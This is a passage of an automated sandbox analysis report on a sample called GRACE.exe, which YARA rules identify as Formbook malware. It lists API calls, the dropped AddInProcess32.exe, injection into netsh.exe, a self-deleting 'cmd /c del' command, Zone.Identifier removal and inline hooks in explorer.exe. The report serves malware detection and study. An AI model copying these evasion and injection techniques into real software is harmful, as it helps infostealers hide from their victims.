          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037397A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03739670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03739660 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03739650 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03739610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03739560 NtWriteFile,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0373AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03739520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037395F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_00D19D60 NtCreateFile,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_00D19E90 NtClose,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_00D19E10 NtReadFile,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_00D19D5D NtCreateFile,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_00D19E8A NtClose,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_00D19E0B NtReadFile,
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_02633FAC CreateProcessAsUserW,
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_02630040
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_02638A48
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_02630A28
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_02633810
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_02634340
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_02631D50
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_02636158
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_02639668
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_02638A38
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_02633800
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_02630007
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_02630A19
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_026378F0
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_026354A8
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_026340BD
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_02635499
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_02631D40
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_02636149
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_02635920
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_0263590F
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_02636BF8
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_026FEA58
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_026FD328
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_026FC830
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_026F6638
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_026F2E01
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_026F9D60
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_026F45E8
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_026FB4A0
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_06CE2680
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_06CE0670
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_06CE84B8
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_06CE1E89
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_06CECE68
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_06CE0663
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_06CE2670
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_06CECE58
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_06CE7B38
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_06CE7B30
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_06CED978
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_00401030
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0041D8D2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0041E197
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0041D313
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_00402D87
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_00402D90
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_00409E40
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0041D63C
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_00409E3F
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0041DF97
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0041DFAA
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_00402FB0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_008E2050
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01354120
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0133F900
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013599BF
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0135A830
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F1002
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0140E824
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013620A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0134B090
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_014028EC
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_014020A8
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0135A309
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01402B28
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0135AB40
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0136EBB0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013E23E3
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F03DA
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013FDBD2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0136ABD8
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013EFA2B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F4AEF
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_014022AE
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01330D20
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01401D55
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01402D07
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_014025DD
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01362581
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F2D82
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0134D5E0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0134841F
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013FD466
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F4496
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0140DFCE
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01401FF1
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01356E30
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013FD616
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01402EF7
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0371AB40
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037C2B28
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037B03DA
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037BDBD2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0372EBB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037AFA2B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037C22AE
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03714120
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_036FF900
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0371A830
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037CE824
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037B1002
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037C28EC
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037220A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037C20A8
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0370B090
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037C1FF1
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037CDFCE
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03716E30
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037BD616
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037C2EF7
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037C1D55
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_036F0D20
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037C2D07
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0370D5E0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037C25DD
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03722581
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037BD466
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0370841F
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_00D1E197
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_00D02D90
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_00D02D87
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_00D09E40
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_00D09E3F
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_00D1DF97
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_00D02FB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_00D1DFAA
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe 23F4A2CCDCE499C524CF43793FDA8E773D809514B5471C02FA5E68F0CDA7A10B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: String function: 0133B150 appears 133 times
          Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 036FB150 appears 54 times
          Source: GRACE.exe, 00000000.00000002.292894435.0000000002600000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRunPe6.dll" vs GRACE.exe
          Source: GRACE.exe, 00000000.00000002.296613818.00000000059D0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs GRACE.exe
          Source: GRACE.exe, 00000000.00000002.295354303.0000000003851000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSHCore1.dll0 vs GRACE.exe
          Source: GRACE.exe, 00000000.00000002.296291104.0000000004F60000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs GRACE.exe
          Source: GRACE.exe, 00000000.00000002.297040723.0000000008800000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAddInProcess32.exeT vs GRACE.exe
          Source: GRACE.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000011.00000002.623489927.0000000000F30000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.623489927.0000000000F30000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.327464918.0000000000EB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.327464918.0000000000EB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.295510880.0000000004197000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.295510880.0000000004197000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.327302486.0000000000D80000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.327302486.0000000000D80000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.621878003.0000000000D00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.621878003.0000000000D00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.623260769.0000000000E70000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.623260769.0000000000E70000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.327086258.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.327086258.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.295698106.0000000004302000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.295698106.0000000004302000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 10.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 10.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/2@12/1
          Source: C:\Users\user\Desktop\GRACE.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\GRACE.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7040:120:WilError_01
          Source: C:\Users\user\Desktop\GRACE.exeFile created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeJump to behavior
          Source: GRACE.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\GRACE.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\GRACE.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Users\user\Desktop\GRACE.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\GRACE.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: GRACE.exeVirustotal: Detection: 62%
          Source: GRACE.exeMetadefender: Detection: 16%
          Source: GRACE.exeReversingLabs: Detection: 43%
          Source: unknownProcess created: C:\Users\user\Desktop\GRACE.exe 'C:\Users\user\Desktop\GRACE.exe'
          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\GRACE.exeProcess created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
          Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
          Source: C:\Users\user\Desktop\GRACE.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: GRACE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: GRACE.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
          Source: GRACE.exeStatic file information: File size 3215360 > 1048576
          Source: GRACE.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x310400
          Source: GRACE.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
          Source: Binary string: AddInProcess32.pdb source: GRACE.exe, 00000000.00000002.297040723.0000000008800000.00000004.00000001.sdmp, AddInProcess32.exe, netsh.exe, 00000011.00000002.630581180.0000000003BFF000.00000004.00000001.sdmp, AddInProcess32.exe.0.dr
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000010.00000000.315609957.000000000E1C0000.00000002.00000001.sdmp
          Source: Binary string: netsh.pdb source: AddInProcess32.exe, 0000000A.00000002.328311598.0000000001640000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 0000000A.00000002.327825504.0000000001310000.00000040.00000001.sdmp, netsh.exe, 00000011.00000002.627626275.00000000037EF000.00000040.00000001.sdmp
          Source: Binary string: netsh.pdbGCTL source: AddInProcess32.exe, 0000000A.00000002.328311598.0000000001640000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: AddInProcess32.exe, netsh.exe
          Source: Binary string: AddInProcess32.pdbpw source: GRACE.exe, 00000000.00000002.297040723.0000000008800000.00000004.00000001.sdmp, AddInProcess32.exe, 0000000A.00000000.284703831.00000000008E2000.00000002.00020000.sdmp, netsh.exe, 00000011.00000002.630581180.0000000003BFF000.00000004.00000001.sdmp, AddInProcess32.exe.0.dr
          Source: Binary string: wscui.pdb source: explorer.exe, 00000010.00000000.315609957.000000000E1C0000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_004F050E push es; retf
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_004F04A6 push es; retf
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_026388F0 pushfd ; retf
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_026FC54A pushfd ; ret
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_026FC511 push FFFFFF8Bh; iretd
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0041CEB5 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0041CF6C push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0041CF02 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0041CF0B push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0138D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0374D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_00D1D856 push esi; ret
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_00D1CEB5 push eax; ret
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_00D1CF6C push eax; ret
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_00D1CF02 push eax; ret
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_00D1CF0B push eax; ret
          Source: C:\Users\user\Desktop\GRACE.exeFile created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
          Source: C:\Users\user\Desktop\GRACE.exeFile opened: C:\Users\user\Desktop\GRACE.exe\:Zone.Identifier read attributes | delete
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8F 0xFE 0xE3
          Source: C:\Users\user\Desktop\GRACE.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GRACE.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GRACE.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GRACE.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GRACE.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GRACE.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GRACE.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GRACE.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GRACE.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GRACE.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GRACE.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GRACE.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GRACE.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GRACE.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GRACE.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GRACE.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GRACE.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GRACE.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GRACE.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GRACE.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GRACE.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GRACE.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GRACE.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GRACE.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GRACE.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GRACE.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GRACE.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GRACE.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GRACE.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GRACE.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GRACE.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GRACE.exeProcess information set: NOOPENFILEERRORBOX
